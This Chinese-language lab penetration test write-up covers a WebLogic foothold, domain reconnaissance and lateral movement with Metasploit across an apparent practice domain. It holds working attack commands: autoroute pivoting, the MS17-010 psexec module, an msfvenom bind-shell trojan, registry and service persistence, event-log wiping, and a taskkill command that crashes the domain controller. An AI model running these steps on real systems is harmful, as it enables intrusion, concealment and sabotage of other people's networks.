外网信息搜集
扫描存活主机
发现两台主机,分别扫描端口
发现两台主机,分别扫描端口
注意到一台主机开启7001端口,存在webLogic漏洞。且两台都445端口均开启。
或者 改变参数,可以发现目标主机存在域环境
漏洞利用
成功获取到会话权限。接下来是后渗透模块。
内网渗透
提权
查看当前权限,发现权限不够,需要提权。使用getsystem无果。
使用bypassuac模块 (这里2和7模块貌似用的比较多)
只需配置一个参数即可
成功提权
内网信息搜集
发现靶机是一台win2008的机器,机器名称为web
发现域内用户
域内成员组
确定域内管理员
确定存在域环境及内外网ip
确定域控及ip
域内机器 通过ping PC确定pc机器的ip
但是无法ping通,可能防火墙阻止了
确定靶机ip
总结: 域控 DC(10.10.10.10) 域管理员 administrator 域 de1ay.com
域内机器 web(靶机) 192.168.138.80 10.10.10.80
pc(10.10.10.201)
域内用户 五个 还有一个扫描出的192.168.138.201,推测是pc这台机器
横向移动
既然内网都在同一网段,考虑使用横向移动的方式控制域控或另一台机器
首先添加路由
run get_local_subnets
run autoroute -s 10.10.10.0/24
run autoroute -p
扫描内网网段存活主机,确定只有这几个机器了。
对域控和pc进行扫描,发现两个都存在445端口和3389端口
利用exploit/windows/smb/ms17_010_psexec模块对两台机器进行利用(这里尝试几次后,发现需要将lhost设为靶机内网ip,将rhost设为目标机器ip)
横向移动到DC
只成功获取域控DC权限
获取存在的hash密码,得到域管理员密码
接下来尝试控制PC
横向移动到PC
利用msf生成一个木马文件,再建立ipc连接
msfvenom -p windows/meterpreter/bind_tcp lport=3300 -f exe -o msf3300.exe
上传木马至DC
将木马文件复制到pc的c盘中
copy msf3300.exe \\10.10.10.201\c$
设置监听,注意此时payload需设为正向
开启远程桌面后双击运行exe木马,msf成功上线
至此获取所有机器权限
权限维持
metsvc服务
对DC进行权限维持,上传了一个开机自启的metsvc服务
run metsvc -A
登录域控看到上传成功
注册表
或者利用注册表,对之前上传的exe文件进行开机自启(因为metsvc服务不一定起作用)
REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Windows\system32\msf6666.exe"
注意:引号必须得是英文的
痕迹清除
查看痕迹 run event_manager -i
run event_manager -c 使用这行命令可以清除windows日志文件中的相关内容。
再次查看时,痕迹已被清除
PS:可以进行一个操作:结束域控DC的进程
taskkill /f /fi “pid ne 1” 这行命令可以使电脑蓝屏